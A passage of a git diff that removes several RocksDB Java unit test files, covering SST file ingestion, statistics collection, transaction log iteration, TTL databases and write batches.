-    keyValues.add(new KeyValueWithOp("key7", "", OpType.DELETE));
-
-
-    final File sstFile = newSstFile(keyValues, false);
-    final File dbFolder = parentFolder.newFolder(DB_DIRECTORY_NAME);
-    try(final StringAppendOperator stringAppendOperator =
-            new StringAppendOperator();
-        final Options options = new Options()
-            .setCreateIfMissing(true)
-            .setMergeOperator(stringAppendOperator);
-        final RocksDB db = RocksDB.open(options, dbFolder.getAbsolutePath());
-        final IngestExternalFileOptions ingestExternalFileOptions =
-            new IngestExternalFileOptions()) {
-      db.ingestExternalFile(Arrays.asList(sstFile.getAbsolutePath()),
-          ingestExternalFileOptions);
-
-      assertThat(db.get("key1".getBytes())).isEqualTo("value1".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("value2".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("value3".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("value4".getBytes());
-      assertThat(db.get("key5".getBytes())).isEqualTo("value5".getBytes());
-      assertThat(db.get("key6".getBytes())).isEqualTo(null);
-      assertThat(db.get("key7".getBytes())).isEqualTo(null);
-    }
-  }
-
-  @Test
-  public void ingestSstFile_cf() throws RocksDBException, IOException {
-    final List<KeyValueWithOp> keyValues = new ArrayList<>();
-    keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT));
-    keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE));
-    keyValues.add(new KeyValueWithOp("key4", "", OpType.DELETE));
-
-    final File sstFile = newSstFile(keyValues, false);
-    final File dbFolder = parentFolder.newFolder(DB_DIRECTORY_NAME);
-    try(final StringAppendOperator stringAppendOperator =
-            new StringAppendOperator();
-        final Options options = new Options()
-            .setCreateIfMissing(true)
-            .setCreateMissingColumnFamilies(true)
-            .setMergeOperator(stringAppendOperator);
-        final RocksDB db = RocksDB.open(options, dbFolder.getAbsolutePath());
-        final IngestExternalFileOptions ingestExternalFileOptions =
-            new IngestExternalFileOptions()) {
-
-      try(final ColumnFamilyOptions cf_opts = new ColumnFamilyOptions()
-              .setMergeOperator(stringAppendOperator);
-          final ColumnFamilyHandle cf_handle = db.createColumnFamily(
-              new ColumnFamilyDescriptor("new_cf".getBytes(), cf_opts))) {
-
-        db.ingestExternalFile(cf_handle,
-            Arrays.asList(sstFile.getAbsolutePath()),
-            ingestExternalFileOptions);
-
-        assertThat(db.get(cf_handle,
-            "key1".getBytes())).isEqualTo("value1".getBytes());
-        assertThat(db.get(cf_handle,
-            "key2".getBytes())).isEqualTo("value2".getBytes());
-        assertThat(db.get(cf_handle,
-            "key3".getBytes())).isEqualTo("value3".getBytes());
-        assertThat(db.get(cf_handle,
-            "key4".getBytes())).isEqualTo(null);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
deleted file mode 100644
index 8dd0cd4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Collections;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class StatisticsCollectorTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void statisticsCollector()
-      throws InterruptedException, RocksDBException {
-    try (final Statistics statistics = new Statistics();
-            final Options opt = new Options()
-        .setStatistics(statistics)
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      try(final Statistics stats = opt.statistics()) {
-
-        final StatsCallbackMock callback = new StatsCallbackMock();
-        final StatsCollectorInput statsInput =
-                new StatsCollectorInput(stats, callback);
-
-        final StatisticsCollector statsCollector = new StatisticsCollector(
-                Collections.singletonList(statsInput), 100);
-        statsCollector.start();
-
-        Thread.sleep(1000);
-
-        assertThat(callback.tickerCallbackCount).isGreaterThan(0);
-        assertThat(callback.histCallbackCount).isGreaterThan(0);
-
-        statsCollector.shutDown(1000);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsTest.java
deleted file mode 100644
index 2103c2f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatisticsTest.java
+++ /dev/null
@@ -1,160 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.nio.charset.StandardCharsets;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class StatisticsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void statsLevel() throws RocksDBException {
-    final Statistics statistics = new Statistics();
-    statistics.setStatsLevel(StatsLevel.ALL);
-    assertThat(statistics.statsLevel()).isEqualTo(StatsLevel.ALL);
-  }
-
-  @Test
-  public void getTickerCount() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      assertThat(statistics.getTickerCount(TickerType.BYTES_READ)).isGreaterThan(0);
-    }
-  }
-
-  @Test
-  public void getAndResetTickerCount() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      final long read = statistics.getAndResetTickerCount(TickerType.BYTES_READ);
-      assertThat(read).isGreaterThan(0);
-
-      final long readAfterReset = statistics.getTickerCount(TickerType.BYTES_READ);
-      assertThat(readAfterReset).isLessThan(read);
-    }
-  }
-
-  @Test
-  public void getHistogramData() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      final HistogramData histogramData = statistics.getHistogramData(HistogramType.BYTES_PER_READ);
-      assertThat(histogramData).isNotNull();
-      assertThat(histogramData.getAverage()).isGreaterThan(0);
-    }
-  }
-
-  @Test
-  public void getHistogramString() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      for(int i = 0; i < 10; i++) {
-        db.put(key, value);
-      }
-
-      assertThat(statistics.getHistogramString(HistogramType.BYTES_PER_WRITE)).isNotNull();
-    }
-  }
-
-  @Test
-  public void reset() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] key = "some-key".getBytes(StandardCharsets.UTF_8);
-      final byte[] value = "some-value".getBytes(StandardCharsets.UTF_8);
-
-      db.put(key, value);
-      for(int i = 0; i < 10; i++) {
-        db.get(key);
-      }
-
-      final long read = statistics.getTickerCount(TickerType.BYTES_READ);
-      assertThat(read).isGreaterThan(0);
-
-      statistics.reset();
-
-      final long readAfterReset = statistics.getTickerCount(TickerType.BYTES_READ);
-      assertThat(readAfterReset).isLessThan(read);
-    }
-  }
-
-  @Test
-  public void ToString() throws RocksDBException {
-    try (final Statistics statistics = new Statistics();
-         final Options opt = new Options()
-             .setStatistics(statistics)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(statistics.toString()).isNotNull();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatsCallbackMock.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatsCallbackMock.java
deleted file mode 100644
index af8db0c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/StatsCallbackMock.java
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class StatsCallbackMock implements StatisticsCollectorCallback {
-  public int tickerCallbackCount = 0;
-  public int histCallbackCount = 0;
-
-  public void tickerCallback(TickerType tickerType, long tickerCount) {
-    tickerCallbackCount++;
-  }
-
-  public void histogramCallback(HistogramType histType,
-      HistogramData histData) {
-    histCallbackCount++;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TransactionLogIteratorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TransactionLogIteratorTest.java
deleted file mode 100644
index b619258..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TransactionLogIteratorTest.java
+++ /dev/null
@@ -1,138 +0,0 @@
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class TransactionLogIteratorTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void transactionLogIterator() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-         final TransactionLogIterator transactionLogIterator =
-             db.getUpdatesSince(0)) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void getBatch() throws RocksDBException {
-    final int numberOfPuts = 5;
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setWalTtlSeconds(1000)
-        .setWalSizeLimitMB(10);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      for (int i = 0; i < numberOfPuts; i++) {
-        db.put(String.valueOf(i).getBytes(),
-            String.valueOf(i).getBytes());
-      }
-      db.flush(new FlushOptions().setWaitForFlush(true));
-
-      // the latest sequence number is 5 because 5 puts
-      // were written beforehand
-      assertThat(db.getLatestSequenceNumber()).
-          isEqualTo(numberOfPuts);
-
-      // insert 5 writes into a cf
-      try (final ColumnFamilyHandle cfHandle = db.createColumnFamily(
-          new ColumnFamilyDescriptor("new_cf".getBytes()))) {
-        for (int i = 0; i < numberOfPuts; i++) {
-          db.put(cfHandle, String.valueOf(i).getBytes(),
-              String.valueOf(i).getBytes());
-        }
-        // the latest sequence number is 10 because
-        // (5 + 5) puts were written beforehand
-        assertThat(db.getLatestSequenceNumber()).
-            isEqualTo(numberOfPuts + numberOfPuts);
-
-        // Get updates since the beginning
-        try (final TransactionLogIterator transactionLogIterator =
-                 db.getUpdatesSince(0)) {
-          assertThat(transactionLogIterator.isValid()).isTrue();
-          transactionLogIterator.status();
-
-          // The first sequence number is 1
-          final TransactionLogIterator.BatchResult batchResult =
-              transactionLogIterator.getBatch();
-          assertThat(batchResult.sequenceNumber()).isEqualTo(1);
-        }
-      }
-    }
-  }
-
-  @Test
-  public void transactionLogIteratorStallAtLastRecord()
-      throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setWalTtlSeconds(1000)
-        .setWalSizeLimitMB(10);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      db.put("key1".getBytes(), "value1".getBytes());
-      // Get updates since the beginning
-      try (final TransactionLogIterator transactionLogIterator =
-               db.getUpdatesSince(0)) {
-        transactionLogIterator.status();
-        assertThat(transactionLogIterator.isValid()).isTrue();
-        transactionLogIterator.next();
-        assertThat(transactionLogIterator.isValid()).isFalse();
-        transactionLogIterator.status();
-        db.put("key2".getBytes(), "value2".getBytes());
-        transactionLogIterator.next();
-        transactionLogIterator.status();
-        assertThat(transactionLogIterator.isValid()).isTrue();
-      }
-    }
-  }
-
-  @Test
-  public void transactionLogIteratorCheckAfterRestart()
-      throws RocksDBException {
-    final int numberOfKeys = 2;
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setWalTtlSeconds(1000)
-        .setWalSizeLimitMB(10)) {
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        db.put("key1".getBytes(), "value1".getBytes());
-        db.put("key2".getBytes(), "value2".getBytes());
-        db.flush(new FlushOptions().setWaitForFlush(true));
-
-      }
-
-      // reopen
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        assertThat(db.getLatestSequenceNumber()).isEqualTo(numberOfKeys);
-
-        try (final TransactionLogIterator transactionLogIterator =
-                 db.getUpdatesSince(0)) {
-          for (int i = 0; i < numberOfKeys; i++) {
-            transactionLogIterator.status();
-            assertThat(transactionLogIterator.isValid()).isTrue();
-            transactionLogIterator.next();
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TtlDBTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TtlDBTest.java
deleted file mode 100644
index cd72634..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/TtlDBTest.java
+++ /dev/null
@@ -1,112 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.concurrent.TimeUnit;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class TtlDBTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void ttlDBOpen() throws RocksDBException, InterruptedException {
-    try (final Options options = new Options().setCreateIfMissing(true).setMaxCompactionBytes(0);
-         final TtlDB ttlDB = TtlDB.open(options, dbFolder.getRoot().getAbsolutePath())) {
-      ttlDB.put("key".getBytes(), "value".getBytes());
-      assertThat(ttlDB.get("key".getBytes())).
-          isEqualTo("value".getBytes());
-      assertThat(ttlDB.get("key".getBytes())).isNotNull();
-    }
-  }
-
-  @Test
-  public void ttlDBOpenWithTtl() throws RocksDBException, InterruptedException {
-    try (final Options options = new Options().setCreateIfMissing(true).setMaxCompactionBytes(0);
-         final TtlDB ttlDB = TtlDB.open(options, dbFolder.getRoot().getAbsolutePath(), 1, false);) {
-      ttlDB.put("key".getBytes(), "value".getBytes());
-      assertThat(ttlDB.get("key".getBytes())).
-          isEqualTo("value".getBytes());
-      TimeUnit.SECONDS.sleep(2);
-      ttlDB.compactRange();
-      assertThat(ttlDB.get("key".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void ttlDbOpenWithColumnFamilies() throws RocksDBException,
-      InterruptedException {
-    final List<ColumnFamilyDescriptor> cfNames = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes())
-    );
-    final List<Integer> ttlValues = Arrays.asList(0, 1);
-
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions dbOptions = new DBOptions()
-        .setCreateMissingColumnFamilies(true)
-        .setCreateIfMissing(true);
-         final TtlDB ttlDB = TtlDB.open(dbOptions,
-             dbFolder.getRoot().getAbsolutePath(), cfNames,
-             columnFamilyHandleList, ttlValues, false)) {
-      try {
-        ttlDB.put("key".getBytes(), "value".getBytes());
-        assertThat(ttlDB.get("key".getBytes())).
-            isEqualTo("value".getBytes());
-        ttlDB.put(columnFamilyHandleList.get(1), "key".getBytes(),
-            "value".getBytes());
-        assertThat(ttlDB.get(columnFamilyHandleList.get(1),
-            "key".getBytes())).isEqualTo("value".getBytes());
-        TimeUnit.SECONDS.sleep(2);
-
-        ttlDB.compactRange();
-        ttlDB.compactRange(columnFamilyHandleList.get(1));
-
-        assertThat(ttlDB.get("key".getBytes())).isNotNull();
-        assertThat(ttlDB.get(columnFamilyHandleList.get(1),
-            "key".getBytes())).isNull();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void createTtlColumnFamily() throws RocksDBException,
-      InterruptedException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final TtlDB ttlDB = TtlDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-         final ColumnFamilyHandle columnFamilyHandle =
-             ttlDB.createColumnFamilyWithTtl(
-                 new ColumnFamilyDescriptor("new_cf".getBytes()), 1)) {
-      ttlDB.put(columnFamilyHandle, "key".getBytes(),
-          "value".getBytes());
-      assertThat(ttlDB.get(columnFamilyHandle, "key".getBytes())).
-          isEqualTo("value".getBytes());
-      TimeUnit.SECONDS.sleep(2);
-      ttlDB.compactRange(columnFamilyHandle);
-      assertThat(ttlDB.get(columnFamilyHandle, "key".getBytes())).isNull();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/Types.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/Types.java
deleted file mode 100644
index c3c1de8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/Types.java
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Simple type conversion methods
- * for use in tests
- */
-public class Types {
-
-  /**
-   * Convert first 4 bytes of a byte array to an int
-   *
-   * @param data The byte array
-   *
-   * @return An integer
-   */
-  public static int byteToInt(final byte data[]) {
-    return (data[0] & 0xff) |
-        ((data[1] & 0xff) << 8) |
-        ((data[2] & 0xff) << 16) |
-        ((data[3] & 0xff) << 24);
-  }
-
-  /**
-   * Convert an int to 4 bytes
-   *
-   * @param v The int
-   *
-   * @return A byte array containing 4 bytes
-   */
-  public static byte[] intToByte(final int v) {
-    return new byte[] {
-        (byte)((v >>> 0) & 0xff),
-        (byte)((v >>> 8) & 0xff),
-        (byte)((v >>> 16) & 0xff),
-        (byte)((v >>> 24) & 0xff)
-    };
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
deleted file mode 100644
index 2a0133f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class WALRecoveryModeTest {
-
-  @Test
-  public void getWALRecoveryMode() {
-    for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-      assertThat(WALRecoveryMode.getWALRecoveryMode(walRecoveryMode.getValue()))
-          .isEqualTo(walRecoveryMode);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
deleted file mode 100644
index 646a31c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
+++ /dev/null
@@ -1,169 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class WriteBatchHandlerTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void writeBatchHandler() throws IOException, RocksDBException {
-    // setup test data
-    final List<Tuple<Action, Tuple<byte[], byte[]>>> testEvents = Arrays.asList(
-        new Tuple<>(Action.DELETE,
-            new Tuple<byte[], byte[]>("k0".getBytes(), null)),
-        new Tuple<>(Action.PUT,
-            new Tuple<>("k1".getBytes(), "v1".getBytes())),
-        new Tuple<>(Action.PUT,
-            new Tuple<>("k2".getBytes(), "v2".getBytes())),
-        new Tuple<>(Action.PUT,
-            new Tuple<>("k3".getBytes(), "v3".getBytes())),
-        new Tuple<>(Action.LOG,
-            new Tuple<byte[], byte[]>(null, "log1".getBytes())),
-        new Tuple<>(Action.MERGE,
-            new Tuple<>("k2".getBytes(), "v22".getBytes())),
-        new Tuple<>(Action.DELETE,
-            new Tuple<byte[], byte[]>("k3".getBytes(), null))
-    );
-
-    // load test data to the write batch
-    try (final WriteBatch batch = new WriteBatch()) {
-      for (final Tuple<Action, Tuple<byte[], byte[]>> testEvent : testEvents) {
-        final Tuple<byte[], byte[]> data = testEvent.value;
-        switch (testEvent.key) {
-
-          case PUT:
-            batch.put(data.key, data.value);
-            break;
-
-          case MERGE:
-            batch.merge(data.key, data.value);
-            break;
-
-          case DELETE:
-            batch.remove(data.key);
-            break;
-
-          case LOG:
-            batch.putLogData(data.value);
-            break;
-        }
-      }
-
-      // attempt to read test data back from the WriteBatch by iterating
-      // with a handler
-      try (final CapturingWriteBatchHandler handler =
-               new CapturingWriteBatchHandler()) {
-        batch.iterate(handler);
-
-        // compare the results to the test data
-        final List<Tuple<Action, Tuple<byte[], byte[]>>> actualEvents =
-            handler.getEvents();
-        assertThat(testEvents.size()).isSameAs(actualEvents.size());
-
-        for (int i = 0; i < testEvents.size(); i++) {
-          assertThat(equals(testEvents.get(i), actualEvents.get(i))).isTrue();
-        }
-      }
-    }
-  }
-
-  private static boolean equals(
-      final Tuple<Action, Tuple<byte[], byte[]>> expected,
-      final Tuple<Action, Tuple<byte[], byte[]>> actual) {
-    if (!expected.key.equals(actual.key)) {
-      return false;
-    }
-
-    final Tuple<byte[], byte[]> expectedData = expected.value;
-    final Tuple<byte[], byte[]> actualData = actual.value;
-
-    return equals(expectedData.key, actualData.key)
-        && equals(expectedData.value, actualData.value);
-  }
-
-  private static boolean equals(byte[] expected, byte[] actual) {
-    if (expected != null) {
-      return Arrays.equals(expected, actual);
-    } else {
-      return actual == null;
-    }
-  }
-
-  private static class Tuple<K, V> {
-    public final K key;
-    public final V value;
-
-    public Tuple(final K key, final V value) {
-      this.key = key;
-      this.value = value;
-    }
-  }
-
-  /**
-   * Enumeration of Write Batch
-   * event actions
-   */
-  private enum Action { PUT, MERGE, DELETE, DELETE_RANGE, LOG }
-
-  /**
-   * A simple WriteBatch Handler which adds a record
-   * of each event that it receives to a list
-   */
-  private static class CapturingWriteBatchHandler extends WriteBatch.Handler {
-
-    private final List<Tuple<Action, Tuple<byte[], byte[]>>> events
-        = new ArrayList<>();
-
-    /**
-     * Returns a copy of the current events list
-     *
-     * @return a list of the events which have happened upto now
-     */
-    public List<Tuple<Action, Tuple<byte[], byte[]>>> getEvents() {
-      return new ArrayList<>(events);
-    }
-
-    @Override
-    public void put(final byte[] key, final byte[] value) {
-      events.add(new Tuple<>(Action.PUT, new Tuple<>(key, value)));
-    }
-
-    @Override
-    public void merge(final byte[] key, final byte[] value) {
-      events.add(new Tuple<>(Action.MERGE, new Tuple<>(key, value)));
-    }
-
-    @Override
-    public void delete(final byte[] key) {
-      events.add(new Tuple<>(Action.DELETE,
-          new Tuple<byte[], byte[]>(key, null)));
-    }
-
-    @Override
-    public void deleteRange(final byte[] beginKey, final byte[] endKey) {
-      events.add(new Tuple<>(Action.DELETE_RANGE, new Tuple<byte[], byte[]>(beginKey, endKey)));
-    }
-
-    @Override
-    public void logData(final byte[] blob) {
-      events.add(new Tuple<>(Action.LOG,
-          new Tuple<byte[], byte[]>(null, blob)));
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchTest.java
deleted file mode 100644
index 83f90c8..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchTest.java
+++ /dev/null
@@ -1,296 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.UnsupportedEncodingException;
-import java.util.Arrays;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-/**
- * This class mimics the db/write_batch_test.cc
- * in the c++ rocksdb library.
- * <p/>
- * Not ported yet:
- * <p/>
- * Continue();
- * PutGatherSlices();
- */
-public class WriteBatchTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void emptyWriteBatch() {
-    try (final WriteBatch batch = new WriteBatch()) {
-      assertThat(batch.count()).isEqualTo(0);
-    }
-  }
-
-  @Test
-  public void multipleBatchOperations()
-      throws UnsupportedEncodingException {
-    try (WriteBatch batch = new WriteBatch()) {
-      batch.put("foo".getBytes("US-ASCII"), "bar".getBytes("US-ASCII"));
-      batch.remove("box".getBytes("US-ASCII"));
-      batch.put("baz".getBytes("US-ASCII"), "boo".getBytes("US-ASCII"));
-
-      WriteBatchTestInternalHelper.setSequence(batch, 100);
-      assertThat(WriteBatchTestInternalHelper.sequence(batch)).
-          isNotNull().
-          isEqualTo(100);
-      assertThat(batch.count()).isEqualTo(3);
-      assertThat(new String(getContents(batch), "US-ASCII")).
-          isEqualTo("Put(baz, boo)@102" +
-              "Delete(box)@101" +
-              "Put(foo, bar)@100");
-    }
-  }
-
-  @Test
-  public void testAppendOperation()
-      throws UnsupportedEncodingException {
-    try (final WriteBatch b1 = new WriteBatch();
-         final WriteBatch b2 = new WriteBatch()) {
-      WriteBatchTestInternalHelper.setSequence(b1, 200);
-      WriteBatchTestInternalHelper.setSequence(b2, 300);
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat(getContents(b1).length).isEqualTo(0);
-      assertThat(b1.count()).isEqualTo(0);
-      b2.put("a".getBytes("US-ASCII"), "va".getBytes("US-ASCII"));
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat("Put(a, va)@200".equals(new String(getContents(b1),
-          "US-ASCII")));
-      assertThat(b1.count()).isEqualTo(1);
-      b2.clear();
-      b2.put("b".getBytes("US-ASCII"), "vb".getBytes("US-ASCII"));
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat(("Put(a, va)@200" +
-          "Put(b, vb)@201")
-          .equals(new String(getContents(b1), "US-ASCII")));
